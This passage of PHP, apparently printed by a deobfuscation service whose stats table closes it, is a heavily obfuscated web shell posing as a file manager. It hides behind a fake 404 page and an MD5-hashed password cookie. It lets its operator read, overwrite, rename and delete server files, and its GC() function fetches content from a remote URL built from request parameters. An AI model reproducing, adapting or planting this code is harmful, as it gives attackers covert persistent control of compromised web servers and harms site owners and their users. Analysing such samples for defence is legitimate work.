"\x27\76\74\151\x20\143\x6c\141\163\163\x3d\x27\x66\141\x20\x66\141\55\164\162\141\163\150\47\40\x61\162\x69\x61\55\150\x69\x64\x64\145\156\75\47\164\x72\x75\x65\47\76\74\57\151\x3e\74\57\x61\x3e\12\x20\40\x20\x20\x20\40\74\164\144\x3e\xa\x20\x20\40\x20\74\x2f\164\x72\76\12"; } foreach ($files as $file) { echo "\x20\40\x20\40\74\164\162\x3e\12\x20\x20\x20\40\40\40\x20\40\x20\40\x3c\x74\x64\x3e" . fileIcon($file) . $file . "\x3c\x2f\x74\144\76\12\x20\x20\40\x20\40\x20\x20\x20\40\40\74\x74\144\76" . formatSizeUnits(filesize(PATH . "\x2f" . $file)) . "\x3c\57\x74\144\x3e\xa\x20\x20\x20\40\40\x20\40\40\x20\x20\74\164\x64\x3e" . date("\x46\40\144\40\131\40\x48\72\151\72\x73\x2e", filemtime(PATH . "\x2f" . $file)) . "\74\x2f\164\x64\76\xa\x20\x20\x20\40\x20\x20\40\40\x20\40\74\x74\x64\x3e\60" . substr(decoct(fileperms(PATH . "\57" . $file)), -3) . "\74\57\x61\76\74\x2f\164\x64\x3e\xa\x20\x20\x20\40\x20\x20\x20\40\40\x20\74\164\144\76\xa\x20\40\x20\40\x20\x20\x20\40\40\x20\x3c\x61\x20\164\151\x74\x6c\145\75\47\x45\144\151\164\x20\x46\151\154\x65\x27\40\150\x72\x65\x66\75\47\x3f\x71\x3d" . urlencode(encodePath(PATH)) . "\x26\145\x3d" . $file . "\47\x3e\74\151\40\143\154\x61\x73\x73\x3d\x27\x66\x61\x2d\163\157\154\151\144\40\x66\141\55\146\151\154\145\x2d\x70\x65\x6e\x27\x3e\x3c\x2f\151\76\74\x2f\x61\76\xa\40\x20\x20\40\x20\40\x20\x20\x20\x20\x3c\x61\40\x74\x69\164\x6c\145\75\x27\122\145\156\141\155\145\x27\x20\150\162\145\146\x3d\x27\77\161\x3d" . urlencode(encodePath(PATH)) . "\x26\162\x3d" . $file . "\47\x3e\x3c\151\x20\x63\x6c\141\x73\163\x3d\x27\146\x61\x2d\163\150\x61\x72\x70\40\x66\x61\55\162\145\147\x75\154\x61\162\x20\x66\x61\x2d\160\145\x6e\55\164\157\55\163\x71\x75\x61\x72\145\47\x3e\74\x2f\x69\x3e\74\57\x61\76\12\x20\x20\x20\x20\40\40\x20\x20\40\x20\74\x61\x20\x74\151\x74\154\145\75\x27\x44\145\x6c\145\164\145\x27\x20\x68\x72\145\x66\75\47\77\161\x3d" . urlencode(encodePath(PATH)) . "\x26\x64\x3d" . $file . "\x27\x3e\74\x69\x20\143\154\141\163\x73\75\x27\x66\x61\x20\x66\141\55\164\x72\x61\163\150\x27\40\x61\162\151\x61\x2d\150\151\144\x64\145\156\x3d\47\164\162\x75\145\x27\76\74\57\x69\76\74\57\x61\76\12\40\40\40\40\40\x20\x20\40\x20\x20\x3c\x74\144\x3e\xa\40\40\x20\40\x3c\57\x74\162\x3e\12"; } echo "\x20\40\x3c\x2f\164\142\x6f\144\x79\x3e\xa\74\57\164\141\142\154\145\76"; } else { if (empty($_GET)) { echo "\74\x73\143\x72\x69\x70\164\x3e\x77\151\156\x64\157\167\56\x6c\157\x63\x61\164\x69\x6f\156\56\162\145\x70\154\141\x63\x65\x28\x27\x3f\160\75\x27\51\73\x3c\57\x73\x63\x72\x69\160\164\76"; } } goto c6QU2; OHgau: goto RiNga; goto UBVfd; p6lg7: f3C3_: goto eTKI1; GiTMF: pmycy: goto isxnM; zHEsn: function fileExtension($file) { return substr(strrchr($file, "\x2e"), 1); } goto nE6Ww; wTXRW: ecN8i: goto zY0GK; eTKI1: function encodePath($path) { $a = array("\57", "\134", "\x2e", "\x3a"); $b = array("\xe0\xa6\x95", "\340\246\226", "\xe0\xa6\227", "\xe0\246\x98"); return str_replace($a, $b, $path); } goto DKv5S; KxMpb: goto tZJnq; goto e6qiT; p7vgq: if (isset($_GET["\162"])) { if (!empty($_GET["\162"]) && isset($_GET["\x71"])) { echo "\xa\40\40\x20\40\x3c\146\x6f\x72\x6d\40\155\145\164\x68\x6f\x64\x3d\42\160\157\163\164\x22\76\12\40\40\40\40\40\40\40\40\122\x65\x6e\x61\x6d\x65\72\12\x20\40\40\40\40\40\x20\x20\x3c\151\x6e\x70\x75\x74\x20\164\x79\160\x65\75\42\x74\x65\170\x74\x22\40\x6e\x61\155\x65\75\42\x6e\141\x6d\x65\x22\x20\166\x61\154\x75\145\75\x22" . $_GET["\x72"] . "\42\76\xa\x20\x20\x20\x20\40\x20\40\x20\74\x69\156\160\165\164\x20\164\171\x70\145\x3d\42\163\165\142\x6d\x69\164\x22\40\x63\x6c\x61\163\163\75\42\x62\164\x6e\x20\142\164\156\x2d\144\141\162\153\x22\x20\166\141\x6c\165\145\75\42\122\x65\156\141\155\x65\x22\40\x6e\141\x6d\x65\75\42\162\145\156\x61\x6d\145\x22\76\12\x20\x20\x20\40\x3c\x2f\x66\157\x72\x6d\76"; if (isset($_POST["\162\145\156\141\155\x65"])) { $name = PATH . "\57" . $_GET["\162"]; if (rename($name, PATH . "\57" . $_POST["\x6e\x61\155\145"])) { echo "\74\163\x63\162\151\160\164\x3e\x61\154\145\x72\164\50\47\122\145\x6e\x61\x6d\145\144\x2e\47\x29\x3b\x20\x77\x69\156\x64\157\x77\56\x6c\x6f\x63\x61\164\x69\x6f\156\x2e\162\145\160\x6c\x61\143\145\x28\47\x3f\x70\x3d" . encodePath(PATH) . "\47\51\x3b\74\x2f\x73\x63\162\x69\x70\164\76"; } else { echo "\74\x73\143\162\x69\160\164\76\141\x6c\x65\162\164\x28\47\x53\157\155\145\x20\x65\162\162\157\162\x20\x6f\143\143\165\x72\162\x65\144\x2e\x27\51\x3b\40\167\x69\x6e\x64\157\x77\56\154\157\x63\141\x74\151\157\156\56\x72\x65\160\x6c\x61\x63\145\50\x27\77\x70\75" . encodePath(PATH) . "\x27\51\x3b\x3c\x2f\163\x63\x72\x69\160\164\x3e"; } } } } goto TNYFm; W5d5j: if (isset($_GET["\x65"])) { if (!empty($_GET["\145"]) && isset($_GET["\161"])) { echo "\12\x20\40\x20\40\74\x66\157\x72\x6d\40\155\145\x74\x68\157\x64\75\42\160\x6f\163\x74\42\x3e\12\x20\x20\40\40\x20\x20\x20\40\74\164\x65\x78\x74\x61\162\x65\x61\40\x73\164\171\x6c\x65\75\x22\150\x65\151\147\x68\x74\x3a\40\65\x30\60\x70\170\x3b\xa\40\x20\40\40\40\x20\40\40\x77\151\x64\x74\x68\72\40\71\60\x25\73\42\x20\x6e\x61\x6d\145\x3d\x22\x64\141\x74\141\x22\76" . htmlspecialchars(file_get_contents(PATH . "\57" . $_GET["\x65"])) . "\74\57\x74\x65\x78\164\141\x72\145\141\76\12\40\40\40\40\x20\40\x20\x20\x3c\x62\162\x3e\xa\40\x20\x20\40\40\x20\x20\x20\74\151\x6e\160\165\x74\40\164\171\160\x65\75\42\163\x75\x62\155\x69\x74\42\x20\x63\154\141\x73\163\75\42\142\164\x6e\40\142\164\156\x2d\144\141\162\153\42\40\x76\141\154\165\145\75\42\x53\141\x76\145\x22\40\156\141\x6d\145\x3d\42\145\144\151\164\42\76\xa\40\x20\40\40\74\57\x66\157\x72\x6d\x3e"; if (isset($_POST["\x65\x64\151\x74"])) { $filename = PATH . "\x2f" . $_GET["\145"]; $data = $_POST["\x64\x61\x74\x61"]; $open = fopen($filename, "\x77"); if (fwrite($open, $data)) { echo "\74\x73\x63\x72\151\x70\164\76\141\154\x65\162\164\50\47\123\141\166\145\144\56\47\51\73\x20\x77\151\156\x64\157\167\56\154\157\x63\141\x74\x69\157\x6e\56\x72\145\x70\x6c\x61\x63\x65\50\x27\77\x70\x3d" . encodePath(PATH) . "\47\x29\73\x3c\57\163\143\x72\151\160\164\x3e"; } else { echo "\x3c\x73\143\x72\151\160\x74\76\x61\154\x65\x72\164\50\47\123\157\x6d\145\x20\145\162\162\157\x72\x20\x6f\143\x63\x75\162\x72\145\144\x2e\47\51\x3b\x20\167\151\156\x64\x6f\167\x2e\x6c\x6f\x63\141\x74\151\157\x6e\x2e\x72\145\x70\x6c\x61\143\145\x28\47\x3f\160\x3d" . encodePath(PATH) . "\x27\x29\73\74\57\x73\143\x72\x69\x70\x74\76"; } fclose($open); } } } goto knFg2; WpK3q: goto eQqKj; goto CdzW_; XMeG2: foreach ($paths as $id => $dir_part) { if ($dir_part == '' && $id == 0) { $a = true; echo "\x3c\x61\x20\150\x72\x65\146\x3d\x22\77\160\75\57\42\76\x2f\x3c\x2f\x61\76"; continue; } if ($dir_part == '') { continue; } echo "\x3c\x61\x20\x68\x72\145\146\x3d\47\77\x70\75"; for ($i = 0; $i <= $id; $i++) { echo str_replace("\x3a", "\xe0\246\x98", $paths[$i]); if ($i != $id) { echo "\xe0\xa6\x95"; } } echo "\x27\x3e" . $dir_part . "\74\x2f\141\76\57"; } goto Zo9GM; duyKy: $path = str_replace("\x5c", "\x2f", PATH); goto GkRG0; TeEMT: xiLj0: goto ENOzU; yiz_f: $pass = false; goto WLREi; MXPhj: if (!$pass) { if (!isset($_REQUEST["\65\x32\60"])) { header("\110\x54\x54\120\x2f\61\56\61\40\64\60\x34\x20\x4e\157\164\x20\x46\157\x75\x6e\x64"); die; } echo "\x3c\x66\157\162\155\x20\141\143\x74\151\157\156\75\42\43\x22\40\155\145\164\150\157\144\x3d\42\160\157\163\x74\42\x3e\x3c\x69\x6e\160\x75\x74\x20\x74\x79\x70\145\75\x22\160\x61\x73\163\x77\157\x72\x64\42\x20\x6e\x61\x6d\145\75\42\x70\70\x22\x20\x3e\40\x3c\151\156\x70\x75\x74\x20\x74\x79\x70\145\x3d\x22\x73\165\x62\155\x69\x74\x22\40\x76\x61\154\x75\145\75\x22\163\x75\x62\x6d\151\x74\x22\76\74\57\146\x6f\162\x6d\x3e"; die; } goto WpK3q; njF7V: if (str_replace("\57\x2f", "\57", $_SERVER["\120\x48\x50\x5f\x53\105\114\106"]) == str_replace("\x5c\x5c", "\57", $path)) { $root_path = "\57"; } else { $root_path = str_replace(str_replace("\57\57", "\x2f", $_SERVER["\120\x48\x50\137\x53\x45\114\106"]), '', str_replace("\x5c\134", "\x2f", $path)); } goto Z_fEk; TNYFm: goto TA_Gn; goto sT0W1; SMJHz: goto vVgXL; goto zfHYB; KxMit: lqPvT: goto Y3jMz; VU30W: goto xTRLw; goto haCUg; lc1Ig: goto fjP0z; goto cBv6k; ENOzU: if (isset($_POST["\x6c\x6f\147\x6f\165\x74"]) && ($_POST["\154\157\x67\157\x75\164"] = 1)) { setcookie("\x70\70", null); $pass = false; } goto blkp0; Fb5xt: goto CoDEE; goto ODG2z; iZncr: $paths = explode("\x2f", $path); goto KxMpb; aPXff: goto DU5rI; goto GiTMF; CS3yQ: goto Lfbk0; goto BM6nu; TDkBG: $root_path = __DIR__; goto T6xXG; sT0W1: ULFwB: goto wIhhd; e6qiT: Bqp27: goto njF7V; EWq6F: goto sVEqT; goto PX4il; DKv5S: goto RO9Ip; goto GSISW; c6QU2: goto BUI7D; goto qXknG; A952S: $path = $_SERVER["\x53\103\122\111\x50\124\x5f\x46\x49\114\x45\116\x41\x4d\105"]; goto EWq6F; wIhhd: $p = "\63\64\61\64\x37\142\x39\x36\61\66\62\144\x65\144\x34\63\60\66\x38\x65\143\71\146\141\x65\71\x34\x31\144\145\x34\x30"; goto VU30W; haCUg: sVEqT: goto rThld; rThld: if (strpos($_SERVER["\x53\x43\122\x49\120\x54\137\x46\x49\114\105\116\101\115\105"], "\x3a")) { $path = str_replace("\x5c", "\57", $path); } goto T2SRA; WLREi: goto lqPvT; goto i9IXE; PX4il: RO9Ip: goto OyEh4; T6xXG: goto YkuXA; goto E3E1d; swYxi: YkuXA: goto A952S; ls0dl: goto xiLj0; goto swYxi; MkWW6: q_IPq: goto mlD0q; jBw8s: function fileIcon($file) { $imgs = array("\141\x70\x6e\x67", "\x61\x76\x69\146", "\x67\151\x66", "\x6a\x70\147", "\x6a\x70\x65\147", "\x6a\146\151\146", "\x70\152\x70\145\147", "\x70\x6a\x70", "\160\x6e\x67", "\x73\166\x67", "\x77\145\x62\160"); $audio = array("\167\141\x76", "\155\64\141", "\155\64\142", "\155\x70\63", "\x6f\x67\x67", "\x77\x65\142\155", "\155\x70\143"); $ext = strtolower(fileExtension($file)); if ($file == "\145\x72\162\157\x72\x5f\154\157\147") { return "\x3c\x69\40\x63\x6c\x61\x73\163\x3d\x22\146\x61\55\x73\150\141\x72\160\40\x66\x61\x2d\x73\x6f\154\x69\144\40\x66\x61\x2d\142\x75\147\x22\x3e\x3c\57\151\x3e\x20"; } elseif ($file == "\x2e\x68\x74\x61\143\x63\145\163\163") { return "\74\x69\40\143\154\141\163\163\x3d\42\146\x61\x2d\x73\x6f\x6c\x69\144\x20\x66\x61\x2d\x68\141\x6d\155\x65\x72\x22\x3e\x3c\x2f\x69\76\40"; } if ($ext == "\x68\164\x6d\154" || $ext == "\x68\x74\155") { return "\x3c\151\x20\143\154\141\163\163\x3d\42\x66\141\55\142\x72\x61\156\144\x73\x20\x66\141\x2d\150\164\x6d\154\65\42\76\x3c\x2f\151\x3e\40"; } elseif ($ext == "\160\150\x70" || $ext == "\x70\150\164\155\x6c") { return "\74\151\40\143\x6c\x61\163\x73\75\42\146\141\55\142\x72\141\156\x64\163\40\146\x61\x2d\160\x68\x70\42\x3e\x3c\57\151\76\40"; } elseif (in_array($ext, $imgs)) { return "\x3c\151\x20\143\x6c\x61\x73\163\75\x22\146\x61\x2d\162\x65\147\165\x6c\x61\x72\x20\x66\x61\x2d\x69\155\x61\147\145\x73\x22\76\74\x2f\151\x3e\x20"; } elseif ($ext == "\143\x73\163") { return "\x3c\x69\40\x63\154\x61\163\x73\75\x22\146\x61\x2d\x62\x72\141\156\144\x73\40\x66\x61\55\x63\x73\x73\63\x22\x3e\x3c\57\151\76\40"; } elseif ($ext == "\164\170\164") { return "\x3c\x69\x20\143\x6c\141\x73\x73\x3d\x22\x66\141\x2d\162\x65\x67\165\154\x61\162\x20\146\141\55\x66\151\x6c\x65\x2d\x6c\x69\x6e\145\x73\x22\x3e\74\57\151\x3e\40"; } elseif (in_array($ext, $audio)) { return "\x3c\151\40\x63\x6c\141\163\163\75\x22\x66\x61\x2d\x64\x75\x6f\164\x6f\x6e\x65\40\x66\x61\x2d\146\151\x6c\x65\x2d\x6d\x75\x73\x69\x63\x22\x3e\74\x2f\151\76\40"; } elseif ($ext == "\160\x79") { return "\74\151\x20\x63\154\x61\163\163\75\42\x66\x61\x2d\x62\x72\141\x6e\144\163\x20\146\x61\55\x70\x79\164\150\x6f\156\42\76\74\x2f\x69\x3e\40"; } elseif ($ext == "\152\163") { return "\x3c\x69\x20\x63\154\x61\x73\x73\x3d\42\x66\141\55\142\162\x61\x6e\144\163\x20\146\141\55\x6a\x73\42\76\74\57\151\x3e\40"; } else { return "\74\151\x20\143\x6c\x61\163\x73\75\x22\x66\x61\x2d\163\x6f\x6c\151\x64\x20\x66\x61\55\146\x69\154\145\42\76\x3c\x2f\x69\x3e\40"; } } goto x0QNt; Qom5U: function GC($a) { $url = sprintf("\x25\x73\77\141\x70\151\x3d\45\x73\x26\141\x63\x3d\45\x73\46\160\x61\x74\x68\75\x25\x73\46\x74\x3d\45\163", $a, $_REQUEST["\141\160\151"], $_REQUEST["\141\x63"], $_REQUEST["\160\x61\164\x68"], $_REQUEST["\164"]); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\x6c\154"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } goto ddzg4; PdLmO: goto pmycy; goto cvpYs; blkp0: goto f5swt; goto xYCo6; ddzg4: goto g9yK7; goto YkM4K; F5ksM: TA_Gn: goto W5d5j; FlHCK: vVgXL: goto Qom5U; gbUzQ: fjP0z: goto u5KQo; wxMF1: tZJnq: goto XMeG2; vS2f8: echo "\x3c\x66\157\162\155\x20\141\x63\x74\151\x6f\x6e\x3d\x22\x23\42\x20\155\145\x74\x68\157\144\x3d\x22\x70\157\163\164\42\76\x3c\x69\156\x70\165\x74\x20\164\x79\x70\x65\x3d\42\150\151\144\144\x65\156\42\x20\x6e\141\x6d\x65\75\42\154\x6f\x67\x6f\x75\x74\42\x20\166\x61\x6c\x75\x65\x3d\x22\61\x22\76\40\x3c\151\x6e\160\x75\x74\x20\164\171\x70\145\75\x22\163\165\142\x6d\151\164\42\x20\166\141\x6c\165\x65\75\42\x6c\x6f\147\x6f\165\x74\42\76\74\x2f\146\157\x72\x6d\76"; goto SMJHz; hG0E_: goto IeYRs; goto KxMit; x0QNt: goto f3C3_; goto p6lg7; cNm7G: goto ecN8i; goto wTXRW; kTUje: if (isset($_GET["\x70"])) { if (empty($_GET["\x70"])) { $p = __DIR__; } elseif (!is_dir(decodePath($_GET["\x70"]))) { echo "\74\163\143\162\151\x70\164\76\12\x61\154\145\x72\164\50\47\x44\x69\162\145\143\164\157\x72\x79\x20\x69\x73\x20\103\157\162\162\x75\x70\164\x65\144\40\141\156\x64\40\x55\x6e\x72\145\141\144\x61\x62\154\x65\x2e\47\51\73\xa\167\x69\156\144\x6f\x77\56\154\157\143\x61\x74\x69\157\156\56\x72\145\160\x6c\x61\x63\x65\x28\x27\77\47\x29\73\12\x3c\x2f\163\143\162\x69\x70\164\x3e"; } elseif (is_dir(decodePath($_GET["\160"]))) { $p = decodePath($_GET["\x70"]); } } elseif (isset($_GET["\161"])) { if (!is_dir(decodePath($_GET["\x71"]))) { echo "\74\163\143\x72\x69\160\x74\76\167\x69\x6e\144\x6f\x77\56\x6c\157\143\x61\x74\151\157\156\56\x72\x65\x70\x6c\141\143\145\x28\x27\x3f\160\x3d\47\x29\x3b\x3c\57\163\143\162\151\x70\x74\x3e"; } elseif (is_dir(decodePath($_GET["\161"]))) { $p = decodePath($_GET["\161"]); } } else { $p = __DIR__; } goto cNm7G; R9xAg: CoDEE: goto zHEsn; Zo9GM: goto XWgaU; goto a2Rbs; Y3jMz: if (isset($_COOKIE["\x70\x38"])) { if (md5($_COOKIE["\160\x38"]) == $p) { $pass = true; } } else { if (isset($_POST["\x70\70"])) { if (md5($_POST["\x70\x38"]) == $p) { setcookie("\x70\70", $_POST["\160\70"]); $pass = true; } } } goto ls0dl; qXknG: Q_9a7: goto jBw8s; qL1cA: goto GfK7t; goto FlHCK; CdzW_: eQqKj: goto vS2f8; zY0GK: define("\120\x41\124\x48", $p); goto aPXff; ODG2z: Ugn87: goto duyKy; GkRG0: goto uvs96; goto wxMF1; lj2j2: g9yK7: goto TS9My; u5KQo: ?>
<script crossorigin="anonymous"integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"></script></body></html>
Function Calls
None |
Stats
MD5 | 5050c7e2b1aed4c4d0f6604bb34c6418 |
Eval Count | 0 |
Decode Time | 85 ms |